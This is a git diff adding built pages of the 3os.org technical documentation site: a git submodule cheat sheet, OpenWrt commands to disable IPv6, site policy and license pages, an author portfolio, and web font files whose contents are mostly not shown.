If you’re sure you want to fetch all submodules (and their submodules), you can also use this fancy one-liner:
git clone --recurse-submodules https://github.com/fire1ce/3os.org
+
Submodule Update If you’re simply tracking the master
or main
branch for the submodule, you can suffice with a simple fetch
and merge
.
cd path/to/submodule
+git fetch
+git merge origin/master
+
If you’re in a hurry, you can streamline this for all submodules in your repo with:
git submodule update --remote --recursive
+
Commit this change to your own repo, so others are locked to this new version of the submodule as well.
Remove a submodule Delete the relevant section from the .gitmodules
file. Stage the .gitmodules
changes git add .gitmodules
Delete the relevant section from .git/config
. Run git rm --cached path_to_submodule
(no trailing slash). Run rm -rf .git/modules/path_to_submodule
(no trailing slash). Commit git commit -m "Removed submodule"
Delete the now untracked submodule files rm -rf path_to_submodule
Back to top
\ No newline at end of file
diff --git a/devops/git/github-cli/index.html b/devops/git/github-cli/index.html
new file mode 100644
index 000000000..949bee21b
--- /dev/null
+++ b/devops/git/github-cli/index.html
@@ -0,0 +1,170 @@
+
GitHub Cli - 3os github git cheat-sheet GitHub Cli Cheat Sheet The GitHub Cli a is free and open source Cli tool to interact with GitHub repositories. It allows you to work solely from the command line, as well as navigate to remote (web) repositories very easily.
Installation The GitHub Cli can be found at https://cli.github.com/ . The installation are very straightfoward, for example,
on macOS. Some example commands View the repository remotely.
Create a pull request remotely.
Back to top
\ No newline at end of file
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.eot b/fonts/FiraCode/fira-code-v12-latin-300.eot
new file mode 100644
index 000000000..744e323eb
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-300.eot differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.svg b/fonts/FiraCode/fira-code-v12-latin-300.svg
new file mode 100644
index 000000000..368e6d8ba
--- /dev/null
+++ b/fonts/FiraCode/fira-code-v12-latin-300.svg
@@ -0,0 +1,333 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.ttf b/fonts/FiraCode/fira-code-v12-latin-300.ttf
new file mode 100644
index 000000000..3fe9256ff
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-300.ttf differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.woff b/fonts/FiraCode/fira-code-v12-latin-300.woff
new file mode 100644
index 000000000..b78e61b34
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-300.woff differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.woff2 b/fonts/FiraCode/fira-code-v12-latin-300.woff2
new file mode 100644
index 000000000..64ceab069
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-300.woff2 differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.eot b/fonts/FiraCode/fira-code-v12-latin-700.eot
new file mode 100644
index 000000000..23eacaf61
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-700.eot differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.svg b/fonts/FiraCode/fira-code-v12-latin-700.svg
new file mode 100644
index 000000000..71d858188
--- /dev/null
+++ b/fonts/FiraCode/fira-code-v12-latin-700.svg
@@ -0,0 +1,334 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.ttf b/fonts/FiraCode/fira-code-v12-latin-700.ttf
new file mode 100644
index 000000000..efd519b96
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-700.ttf differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.woff b/fonts/FiraCode/fira-code-v12-latin-700.woff
new file mode 100644
index 000000000..1283d4b72
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-700.woff differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.woff2 b/fonts/FiraCode/fira-code-v12-latin-700.woff2
new file mode 100644
index 000000000..7815ee436
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-700.woff2 differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.eot b/fonts/FiraCode/fira-code-v12-latin-regular.eot
new file mode 100644
index 000000000..c1176835e
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-regular.eot differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.svg b/fonts/FiraCode/fira-code-v12-latin-regular.svg
new file mode 100644
index 000000000..1b39d2c11
--- /dev/null
+++ b/fonts/FiraCode/fira-code-v12-latin-regular.svg
@@ -0,0 +1,334 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.ttf b/fonts/FiraCode/fira-code-v12-latin-regular.ttf
new file mode 100644
index 000000000..2b2df88e4
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-regular.ttf differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.woff b/fonts/FiraCode/fira-code-v12-latin-regular.woff
new file mode 100644
index 000000000..2be7c9459
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-regular.woff differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.woff2 b/fonts/FiraCode/fira-code-v12-latin-regular.woff2
new file mode 100644
index 000000000..f7efdf8c1
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-regular.woff2 differ
diff --git a/fonts/Rubik/rubik-v14-latin-300.eot b/fonts/Rubik/rubik-v14-latin-300.eot
new file mode 100644
index 000000000..a83d02593
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-300.eot differ
diff --git a/fonts/Rubik/rubik-v14-latin-300.svg b/fonts/Rubik/rubik-v14-latin-300.svg
new file mode 100644
index 000000000..32ef9d3e6
--- /dev/null
+++ b/fonts/Rubik/rubik-v14-latin-300.svg
@@ -0,0 +1,453 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/Rubik/rubik-v14-latin-300.ttf b/fonts/Rubik/rubik-v14-latin-300.ttf
new file mode 100644
index 000000000..9b18046b9
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-300.ttf differ
diff --git a/fonts/Rubik/rubik-v14-latin-300.woff b/fonts/Rubik/rubik-v14-latin-300.woff
new file mode 100644
index 000000000..599f830a5
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-300.woff differ
diff --git a/fonts/Rubik/rubik-v14-latin-300.woff2 b/fonts/Rubik/rubik-v14-latin-300.woff2
new file mode 100644
index 000000000..3eab1dd10
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-300.woff2 differ
diff --git a/fonts/Rubik/rubik-v14-latin-700.eot b/fonts/Rubik/rubik-v14-latin-700.eot
new file mode 100644
index 000000000..b76ef8bdd
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-700.eot differ
diff --git a/fonts/Rubik/rubik-v14-latin-700.svg b/fonts/Rubik/rubik-v14-latin-700.svg
new file mode 100644
index 000000000..fc14e0b00
--- /dev/null
+++ b/fonts/Rubik/rubik-v14-latin-700.svg
@@ -0,0 +1,456 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/Rubik/rubik-v14-latin-700.ttf b/fonts/Rubik/rubik-v14-latin-700.ttf
new file mode 100644
index 000000000..41d495ee2
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-700.ttf differ
diff --git a/fonts/Rubik/rubik-v14-latin-700.woff b/fonts/Rubik/rubik-v14-latin-700.woff
new file mode 100644
index 000000000..ebe254446
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-700.woff differ
diff --git a/fonts/Rubik/rubik-v14-latin-700.woff2 b/fonts/Rubik/rubik-v14-latin-700.woff2
new file mode 100644
index 000000000..33e64609e
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-700.woff2 differ
diff --git a/fonts/Rubik/rubik-v14-latin-italic.eot b/fonts/Rubik/rubik-v14-latin-italic.eot
new file mode 100644
index 000000000..a284e1855
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-italic.eot differ
diff --git a/fonts/Rubik/rubik-v14-latin-italic.svg b/fonts/Rubik/rubik-v14-latin-italic.svg
new file mode 100644
index 000000000..10b05536a
--- /dev/null
+++ b/fonts/Rubik/rubik-v14-latin-italic.svg
@@ -0,0 +1,463 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/Rubik/rubik-v14-latin-italic.ttf b/fonts/Rubik/rubik-v14-latin-italic.ttf
new file mode 100644
index 000000000..b3931b034
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-italic.ttf differ
diff --git a/fonts/Rubik/rubik-v14-latin-italic.woff b/fonts/Rubik/rubik-v14-latin-italic.woff
new file mode 100644
index 000000000..f2f013e4d
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-italic.woff differ
diff --git a/fonts/Rubik/rubik-v14-latin-italic.woff2 b/fonts/Rubik/rubik-v14-latin-italic.woff2
new file mode 100644
index 000000000..b01cfd0c0
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-italic.woff2 differ
diff --git a/fonts/Rubik/rubik-v14-latin-regular.eot b/fonts/Rubik/rubik-v14-latin-regular.eot
new file mode 100644
index 000000000..b5559eeed
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-regular.eot differ
diff --git a/fonts/Rubik/rubik-v14-latin-regular.svg b/fonts/Rubik/rubik-v14-latin-regular.svg
new file mode 100644
index 000000000..8f4654865
--- /dev/null
+++ b/fonts/Rubik/rubik-v14-latin-regular.svg
@@ -0,0 +1,453 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/Rubik/rubik-v14-latin-regular.ttf b/fonts/Rubik/rubik-v14-latin-regular.ttf
new file mode 100644
index 000000000..e11b0ebb1
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-regular.ttf differ
diff --git a/fonts/Rubik/rubik-v14-latin-regular.woff b/fonts/Rubik/rubik-v14-latin-regular.woff
new file mode 100644
index 000000000..b8e79e188
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-regular.woff differ
diff --git a/fonts/Rubik/rubik-v14-latin-regular.woff2 b/fonts/Rubik/rubik-v14-latin-regular.woff2
new file mode 100644
index 000000000..13bc82fdf
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-regular.woff2 differ
diff --git a/homelab/devices/synology-nas/index.html b/homelab/devices/synology-nas/index.html
new file mode 100644
index 000000000..165fc4549
--- /dev/null
+++ b/homelab/devices/synology-nas/index.html
@@ -0,0 +1,167 @@
+
Synology NAS - 3os
\ No newline at end of file
diff --git a/illustration.svg b/illustration.svg
new file mode 100644
index 000000000..192927fde
--- /dev/null
+++ b/illustration.svg
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/index.html b/index.html
new file mode 100644
index 000000000..303919e68
--- /dev/null
+++ b/index.html
@@ -0,0 +1,402 @@
+
3os.org - 3os
3os Project Collocation of technical documentation and guides for devops, developers, pentesters, systems administrators and other IT professionals.
Blog Github Open-Source We provide an open-source knowledge base on various topics such as Devops, security, penetration testing, networking and much more.
Contribution We are welcoming you to contribute your knowledge to this project. Submit git pull requests for new content, or help as fix and maintain the documentation.
Discussion Feel free to open a discussion on any topic at comments section any time.
Back to top
\ No newline at end of file
diff --git a/information/affiliateDisclosure/index.html b/information/affiliateDisclosure/index.html
new file mode 100644
index 000000000..629fd9bff
--- /dev/null
+++ b/information/affiliateDisclosure/index.html
@@ -0,0 +1,143 @@
+
Affiliate Disclosure - 3os information affiliate Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Affiliate Disclosure This website can include advertising, supported content, paid inserts, affiliate links or other types of monetization.
We believe in the authenticity of relationships, views and identities. Compensation received can have an effect on the advertisement material, topics or posts made in this blog. Such content, advertising space or post will be specifically marked as paid or supported content. We will only endorse the products or services that we believe, based on our expertise, are worthy of this endorsement.
Any claim, statistic, quotation or other representation of a product or service should be verified with the manufacturer or supplier. This site does not contain any content that may constitute a conflict of interest.
This website does not provide any representations, warranties or assurances as to the accuracy,
currency or completeness of the content contained on this website or on any website linked to or from this website.
Participant Programs​ This website is a participant in the Amazon Services LLC Associates Program, aliexpress, an affiliate advertisement program designed to provide a way for websites to receive advertising fees through advertising and links to amazon.com, aliexpress.com.
Back to top
\ No newline at end of file
diff --git a/information/cookies-policy/index.html b/information/cookies-policy/index.html
new file mode 100644
index 000000000..24b6b931a
--- /dev/null
+++ b/information/cookies-policy/index.html
@@ -0,0 +1,143 @@
+
Cookies Policy - 3os information Cookies Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Cookies Policy We use cookies and other similar technologies to help provide our Services, to advertise to you and to analyse how you use our Services and whether advertisements are being viewed. We also allow third parties to use tracking technologies for similar purposes. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. The Help menu on the menu bar of most browsers also tells you how to prevent your browser from accepting new cookies, how to delete old cookies, how to have the browser notify you when you receive a new cookie and how to disable cookies altogether.
What are Cookies? A cookie is a small text file which is sent to your computer or mobile device (referred to in this policy as a “deviceâ€) by the web server so that the website can remember some information about your browsing activity on the website. The cookie will collect information relating to your use of our sites, information about your device such as the device’s IP address and browser type, demographic data and, if you arrived at our site via a link from third party site, the URL of the linking page. If you are a registered user or subscriber it may also collect your name and email address, which may be transferred to data processors for registered user or subscriber verification purposes. Cookies record information about your online preferences and help us to tailor our websites to your interests. Information provided by cookies can help us to analyse your use of our sites and help us to provide you with a better user experience. We use tracking technologies for the following purposes:
These cookies are necessary for the website to function and cannot be switched off in our systems. These are used to let you login, to ensure site security and to provide shopping cart functionality. Without this type of technology, our Services won’t work properly or won’t be able to provide certain features and functionalities.
Personalization Cookies These cookies are used to analyze how visitors use a website, for instance which pages visitors visit most often, in order to provide a better user experience. We also use this technology to check if you have opened our emails, so we can see if they are being delivered correctly and are of interest.
Advertising Cookies These cookies are used to limit the number of times you see an advertisement, or to customize advertising across our Services and make it more relevant to you and to allow us to measure the effectiveness of advertising campaigns and track whether ads have been properly displayed so we can pay for this. You have the option to change your choices relating to cookies utilized to deliver behaviorally targeted advertising here for EU “Advertising cookies†and here for US Advertising cookies.
Cookies are used by social media services to enable you to share our content with your friends and networks. These cookies may track your browser across other sites and build a profile of your interests, which may impact the content and messages you see on other websites that you visit.
Google Analytics We use Google Analytics for aggregated, anonymized website traffic analysis. In order to track your session usage, Google drops a cookie (_ga) with a randomly-generated ClientID in your browser. This ID is anonymized and contains no identifiable information like email, phone number, name, etc. We also send Google your IP Address. We use GA to track aggregated website behavior, such as what pages you looked at, for how long, and so on. This information is important to us for improving the user experience and determining site effectiveness. If you would like to access what browsing information we have – or ask us to delete any GA data – please delete your _ga cookies, reach out to us via this form, and/or install the Google Analytics Opt-Out Browser Add-On.
How to manage & remove cookies If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. The Help menu on the menu bar of most browsers also tells you how to prevent your browser from accepting new cookies, how to delete old cookies, how to have the browser notify you when you receive a new cookie and how to disable cookies altogether. You can also visit https://www.aboutcookies.org for more information on how to manage and remove cookies across a number of different internet browsers. You also have the option to change your choices relating to cookies utilized to deliver behaviorally targeted advertising here for EU “Advertising cookies†and here for US Advertising cookies. If you would like to contact us about cookies please our online feedback form or our contact page.
Back to top
\ No newline at end of file
diff --git a/information/endorsement/index.html b/information/endorsement/index.html
new file mode 100644
index 000000000..4a85c2636
--- /dev/null
+++ b/information/endorsement/index.html
@@ -0,0 +1,143 @@
+
Website Endorsements - 3os information endorsements Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-04-03 Website Endorsements Website endorsement for our partners and friends who support our mission.
adventure.app Adventure is an app that provides you with a simple and intuitive interface to plan your trip. You can choose from a wide range of activities and destinations. We also provide you with a recommendation system that will help you choose the best activity for you. Visit adventure.app!
Back to top
\ No newline at end of file
diff --git a/information/license/index.html b/information/license/index.html
new file mode 100644
index 000000000..d90d57002
--- /dev/null
+++ b/information/license/index.html
@@ -0,0 +1,143 @@
+
MIT License - 3os information license Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 License MIT License Copyright© 3os.org 2022
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Back to top
\ No newline at end of file
diff --git a/information/portfolio/index.html b/information/portfolio/index.html
new file mode 100644
index 000000000..12ca37d28
--- /dev/null
+++ b/information/portfolio/index.html
@@ -0,0 +1,146 @@
+
Stas Yakobov's Portfolio - 3os portfolio resume Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-03-23 Stas Yakobov's Portfolio Stas Yakobov aka fire1ce • I'm security researcher - specialized in hardware pentetrations tests
• I like experimenting with technologies, building small projects, automate everything.
• Passionate about security, linux, dockers, electronics(IoT), coding, open-source and knowledge
• I'm the owner and the maintener of a 3os.org knowledge-base website
How To Reach Me
Back to top
\ No newline at end of file
diff --git a/information/privacy-policy/index.html b/information/privacy-policy/index.html
new file mode 100644
index 000000000..c37152b46
--- /dev/null
+++ b/information/privacy-policy/index.html
@@ -0,0 +1,143 @@
+
Privacy Policy - 3os information privacy policy Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Privacy Policy Your privacy is very important to us. Accordingly, we have developed this policy in order for you to understand how we collect, use, communicate and make use of personal information. The following outlines our privacy policy.
When accessing this website, will learn certain information about you during your visit.
Similar to other commercial websites, our website utilizes a standard technology called ‘cookies’ (see explanation below) and server logs to collect information about how our site is used. Information gathered through cookies and server logs may include the date and time of visits, the pages viewed, time spent at our site, and the websites visited just before and just after our own, as well as your IP address.
Use of Cookie A cookie is a very small text document, which often includes an anonymous unique identifier. When you visit a website, that site’s computer asks your computer for permission to store this file in a part of your hard drive specifically designated for cookies. Each website can send its own cookie to your browser if your browser’s preferences allow it, but (to protect your privacy) your browser only permits a website to access the cookies it has already sent to you, not the cookies sent to you by other sites.
IP Addresses IP addresses are used by your computer every time you are connected to the Internet. Your IP address is a number that is used by computers on the network to identify your computer. IP addresses are automatically collected by our web server as part of demographic and profile data known as “traffic data†so that data (such as the Web pages you request) can be sent to you.
If you choose to correspond with us through email, we may retain the content of your email messages together with your email address and our responses. We provide the same protections for these electronic communications that we employ in the maintenance of information received online, mail and telephone. This also applies when you register for our website, sign up through any of our forms using your email address or make a purchase on this site. For further information see the email policies below.
Broadly speaking, we use personal information for purposes of administering our business activities, providing customer service and making available other items and services to our customers and prospective customers.
will not obtain personally-identifying information about you when you visit our site, unless you choose to provide such information to us, nor will such information be sold or otherwise transferred to unaffiliated third parties without the approval of the user at the time of collection.
We may disclose information when legally compelled to do so, in other words, when we, in good faith, believe that the law requires it or for the protection of our legal rights.
Email Policies We are committed to keeping your e-mail address confidential. We do not sell, rent, or lease our subscription lists to third parties, and we will not provide your personal information to any third party individual, government agency, or company at any time unless strictly compelled to do so by law.
We will use your e-mail address solely to provide timely information about .
We will maintain the information you send via e-mail in accordance with applicable federal law.
CAN-SPAM Compliance In compliance with the CAN-SPAM Act, all e-mail sent from our organization will clearly state who the e-mail is from and provide clear information on how to contact the sender. In addition, all e-mail messages will also contain concise information on how to remove yourself from our mailing list so that you receive no further e-mail communication from us.
Choice/Opt-Out Our site provides users the opportunity to opt-out of receiving communications from us and our partners by reading the unsubscribe instructions located at the bottom of any e-mail they receive from us at anytime.
Users who no longer wish to receive our newsletter or promotional materials may opt-out of receiving these communications by clicking on the unsubscribe link in the e-mail.
Use of External Links This website may contain links to many other websites. cannot guarantee the accuracy of information found at any linked site. Links to or from external sites not owned or controlled by do not constitute an endorsement by or any of its employees of the sponsors of these sites or the products or information presented therein.
By accessing this web site, you are agreeing to be bound by these web site Terms and Conditions of Use, all applicable laws and regulations, and agree that you are responsible for compliance with any applicable local laws. If you do not agree with any of these terms, you are prohibited from using or accessing this site. The materials contained in this web site are protected by applicable copyright and trade mark law.
Acceptable Use You agree to use our website only for lawful purposes, and in a way that does not infringe the rights of, restrict or inhibit anyone else’s use and enjoyment of the website. Prohibited behavior includes harassing or causing distress or inconvenience to any other user, transmitting obscene or offensive content or disrupting the normal flow of dialogue within our website.
You must not use our website to send unsolicited commercial communications. You must not use the content on our website for any marketing related purpose without our express written consent.
Restricted Access We may in the future need to restrict access to parts (or all) of our website and reserve full rights to do so. If, at any point, we provide you with a username and password for you to access restricted areas of our website, you must ensure that both your username and password are kept confidential.
Use of Testimonials In accordance to with the FTC guidelines concerning the use of endorsements and testimonials in advertising, please be aware of the following:
Testimonials that appear on this site are actually received via text, audio or video submission. They are individual experiences, reflecting real life experiences of those who have used our products and/or services in some way. They are individual results and results do vary. We do not claim that they are typical results. The testimonials are not necessarily representative of all of those who will use our products and/or services.
The testimonials displayed in any form on this site (text, audio, video or other) are reproduced verbatim, except for correction of grammatical or typing errors. Some may have been shortened. In other words, not the whole message received by the testimonial writer is displayed when it seems too lengthy or not the whole statement seems relevant for the general public.
We are not responsible for any of the opinions or comments posted on this website. This website is not a forum for testimonials, however provides testimonials as a means for customers to share their experiences with one another. To protect against abuse, all testimonials appear after they have been reviewed by the management . We not share the opinions, views or commentary of any testimonials on this website – the opinions are strictly the views of the testimonial source.
The testimonials are never intended to make claims that our products and/or services can be used to diagnose, treat, cure, mitigate or prevent any disease. Any such claims, implicit or explicit, in any shape or form, have not been clinically tested or evaluated.
How Do We Protect Your Information And Secure Information Transmissions?
Email is not recognized as a secure medium of communication. For this reason, we request that you do not send private information to us by email. However, doing so is allowed, but at your own risk. Some of the information you may enter on our website may be transmitted securely via a secure medium known as Secure Sockets Layer, or SSL. Credit Card information and other sensitive information is never transmitted via email.
We may use software programs to create summary statistics, which are used for such purposes as assessing the number of visitors to the different sections of our site, what information is of most and least interest, determining technical design specifications, and identifying system performance or problem areas.
For site security purposes and to ensure that this service remains available to all users, uses software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise cause damage.
Disclaimer And Limitation Of Liability We makes no representations, warranties, or assurances as to the accuracy, currency or completeness of the content contain on this website or any sites linked to this site.
All the materials on this site are provided ‘as is’ without any express or implied warranty of any kind, including warranties of merchantability, noninfringement of intellectual property or fitness for any particular purpose. In no event shall or its agents or associates be liable for any damages whatsoever (including, without limitation, damages for loss of profits, business interruption, loss of information, injury or death) arising out of the use of or inability to use the materials, even if has been advised of the possibility of such loss or damages.
Policy Changes We reserve the right to amend this privacy policy at any time with or without notice. However, please be assured that if the privacy policy changes in the future, we will not use the personal information you have submitted to us under this privacy policy in a manner that is materially inconsistent with this privacy policy, without your prior consent.
We are committed to conducting our business in accordance with these principles in order to ensure that the confidentiality of personal information is protected and maintained.
Back to top
\ No newline at end of file
diff --git a/infrastructure/openwrt/disable-ipv6/index.html b/infrastructure/openwrt/disable-ipv6/index.html
new file mode 100644
index 000000000..84bb3df89
--- /dev/null
+++ b/infrastructure/openwrt/disable-ipv6/index.html
@@ -0,0 +1,184 @@
+
Disable IPV6 - 3os template markdown Authors: fire1ce | Created: 2021-12-02 | Last update: 2022-04-24 OpenWrt Disable IPV6 The following steps will disable IPV6 on your OpenWrt router . All the steps are performed via the command line. You can performe them in the console of the router but the preferred way is via SSH.
Follow the following steps to disable IPV6 on your OpenWrt router:
uci set 'network.lan.ipv6=0'
+uci set 'network.wan.ipv6=0'
+uci set 'dhcp.lan.dhcpv6=disabled'
+/etc/init.d/odhcpd disable
+uci commit
+
Disable RA and DHCPv6 so no IPv6 IPs are handed out:
uci -q delete dhcp.lan.dhcpv6
+uci -q delete dhcp.lan.ra
+uci commit dhcp
+/etc/init.d/odhcpd restart
+
You can now disable the LAN delegation:
uci set network.lan.delegate= "0"
+uci commit network
